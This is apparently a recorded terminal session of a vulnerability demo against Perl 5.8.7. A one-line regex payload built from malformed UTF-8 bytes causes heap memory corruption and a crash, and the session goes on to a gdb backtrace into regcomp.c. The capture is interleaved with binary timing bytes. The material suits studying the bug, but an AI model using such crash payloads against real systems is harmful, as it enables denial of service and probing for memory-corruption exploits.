q?G : user@vapor|0; q?GWpq?GNwq?Gdq?G]  q?G  /demos/perl q?G : user@vapor|0; r?G?sr?Gƽor?G1Nur?G(rr?G{ cr?GOU er?Go  r?GqC .s?G5.s?GH/s?GCds?GSes?Glms?Ggos.sh s?GA  s?G6 : demo@vapor|0; s?Ght?Gat?GInt?GI dle_product t?G% t?G}G00. Unicode Desynchronization 1 t?GG01. Unicode Desynchronization 2 t?G0select vulnerability: u?Gw%1u?GZ  u?GZ 'Unicode Desynchronization 2 selected. u?G [  u?G|[ Apayload: $r=chr(0xfc).chr(0xaa).(chr(0x80)x"8")."\\x{100}";/$r/ u?G[ press enter to run. v?Gٿ v?G] [1] 30260 v?GD*** glibc detected *** malloc(): memory corruption: 0x0805ffb0 *** v?Gv../demos.sh: line 80: 30262 Aborted (core dumped) /usr/local/encap/perl-5.8.7/bin/perl -e "$payload" v?G-[1]+ Exit 134 ( eval $cmd ) {?G Core file generated. {?GEOpening gdb ... |?GLIUsing host libthread_db library "/lib/tls/i686/cmov/libthread_db.so.1". |?GoN@ warning: Can't read pathname for load map: Input/output error.|?GN |?GSZReading symbols from /usr/local/encap/perl-5.8.7/lib/5.8.7/x86_64-linux/CORE/libperl.so...|?GIdone. |?GWLoaded symbols for /usr/local/encap/perl-5.8.7/lib/5.8.7/x86_64-linux/CORE/libperl.so |?G6Reading symbols from /lib/tls/i686/cmov/libnsl.so.1...|?GHReading symbols from /usr/lib/debug/lib/tls/i686/cmov/libnsl-2.3.6.so...|?G+done. |?Gh:done. Loaded symbols for /lib/tls/i686/cmov/libnsl.so.1 |?G5Reading symbols from /lib/tls/i686/cmov/libdl.so.2...|?GGReading symbols from /usr/lib/debug/lib/tls/i686/cmov/libdl-2.3.6.so...|?Gdone. |?G9done. Loaded symbols for /lib/tls/i686/cmov/libdl.so.2 |?G4Reading symbols from /lib/tls/i686/cmov/libm.so.6...|?G FReading symbols from /usr/lib/debug/lib/tls/i686/cmov/libm-2.3.6.so...|?Gdone. |?G8done. Loaded symbols for /lib/tls/i686/cmov/libm.so.6 |?GS8Reading symbols from /lib/tls/i686/cmov/libcrypt.so.1...|?GJReading symbols from /usr/lib/debug/lib/tls/i686/cmov/libcrypt-2.3.6.so...|?Gdone. |?G<done. Loaded symbols for /lib/tls/i686/cmov/libcrypt.so.1 |?G7Reading symbols from /lib/tls/i686/cmov/libutil.so.1...|?GIReading symbols from /usr/lib/debug/lib/tls/i686/cmov/libutil-2.3.6.so...|?Gdone. |?G;done. Loaded symbols for /lib/tls/i686/cmov/libutil.so.1 |?G4Reading symbols from /lib/tls/i686/cmov/libc.so.6...|?GFReading symbols from /usr/lib/debug/lib/tls/i686/cmov/libc-2.3.6.so...|?G-@done. |?G@8done. Loaded symbols for /lib/tls/i686/cmov/libc.so.6 |?GA*Reading symbols from /lib/ld-linux.so.2...|?GC6Reading symbols from /usr/lib/debug/lib/ld-2.3.6.so...|?G+Fdone. |?GoF.done. Loaded symbols for /lib/ld-linux.so.2 |?GHjCore was generated by `/usr/local/encap/perl-5.8.7/bin/perl -e $r=chr(0xfc).chr(0xaa).(chr(0x80)x"8").'. |?GH,Program terminated with signal 6, Aborted. |?GI(#0 0xffffe402 in __kernel_vsyscall () |?GJ>>|?G~b}?Gt}?G }?G2(#0 0xffffe402 in __kernel_vsyscall () }?G.>#1 0x43b3d9a1 in raise () from /lib/tls/i686/cmov/libc.so.6 }?G>#2 0x43b3f2b9 in abort () from /lib/tls/i686/cmov/libc.so.6 }?GG#3 0x43b7187a in __libc_message () from /lib/tls/i686/cmov/libc.so.6 }?G,D#4 0x43b789ac in _int_malloc () from /lib/tls/i686/cmov/libc.so.6 }?G}?#5 0x43b7a411 in malloc () from /lib/tls/i686/cmov/libc.so.6 }?G >#6 0xf7f4f041 in Perl_safesysmalloc (size=0x0) at util.c:78 }?GJ#7 0xf7f4730e in Perl_pregcomp (exp=0x805a5c0 "\200\200\200\200\200\200\200\200\\x{100}", xend=0x805a5d1 "", pm=0x8054610) at regcomp.c:1865 }?GQ6#8 0xf7f8a9ec in Perl_pp_regcomp () at pp_ctl.c:127 }?G7#9 0xf7f4d4cc in Perl_runops_debug () at dump.c:1452 }?G\?#10 0xf7f045af in perl_run (my_perl=0x804c008) at perl.c:2000 }?G:N#11 0x080491e2 in main (argc=0x0, argv=0x0, env=0xffffd394) at perlmain.c:98 }?G:>>?G@ u?Gp?GH ?G: 6?G ?G>#6 0xf7f4f041 in Perl_safesysmalloc (size=0x0) at util.c:78 ?GK\78 ptr = (Malloc_t)PerlMem_malloc(size?size:1); /* malloc(0) is NASTY on our system */ ?G>>?GK4u?Gb p?Gl  ?G #7 0xf7f4730e in Perl_pregcomp (exp=0x805a5c0 "\200\200\200\200\200\200\200\200\\x{100}", xend=0x805a5d1 "", pm=0x8054610) at regcomp.c:1865 ?G% =1865 Newz(1004, r->substrs, 1, struct reg_substr_data); ?Gz >>?G*l?G. ?Gة#1860 r->reganch |= ROPT_NAUGHTY; ?G=1861 scan = r->program + 1; /* First BRANCH. */ 1862 ?GF1863 /* XXXX To minimize changes to RE engine we always allocate ?G ,1864 3-units-long substrs field. */ ?GD1865 Newz(1004, r->substrs, 1, struct reg_substr_data); 1866 ?G,;1867 StructCopy(&zero_scan_data, &data, scan_data_t); ?GJU1868 /* XXXX Should not we check for something else? Usually it is OPEN1... */ ?G[E1869 if (OP(scan) != BRANCH) { /* Only one top-level choice. */ ?G>>?Gp?Gb ?Gr?G\ -?GJh >?Gs?G,-u?Gb?Gxs?Gt?G; r?G s?G  ?Gc %$1 = (struct reg_substr_data *) 0x0 ?G >>?GC i?GP n?Gň f?Gh o?G ?GErr?GGe?GFg?Ga  ?GZb eax 0x0?Gib  0x0 ?Gvb ecx 0x7636 0x7636 ?Gb edx 0x6 0x6?Gb  ?Gb ebx 0xf7fedd2c?Gb 0xf7fedd2c ?Gb &esp 0xffffcfe0 0xffffcfe0 ?Gb ebp 0xffffd138?Gb % 0xffffd138 esi 0x805ff94?Gb 0x805ff94 ?Gb edi 0x1 0x1 ?Gc eip 0xf7f4730e?GAc ! 0xf7f4730e ?GNc eflags 0x10246?G\c % [ PF ZF IF RF ] cs 0x23?Gic  0x23 ?Gvc ss 0x2b 0x2b ?Gc ds 0x2b 0x2b?Gc  es 0x2b?Gc  0x2b fs 0x0?Gc  0x0 ?Gc gs 0x63 0x63 ?Gc >>?G quit ?G : demo@vapor|0; ?G exit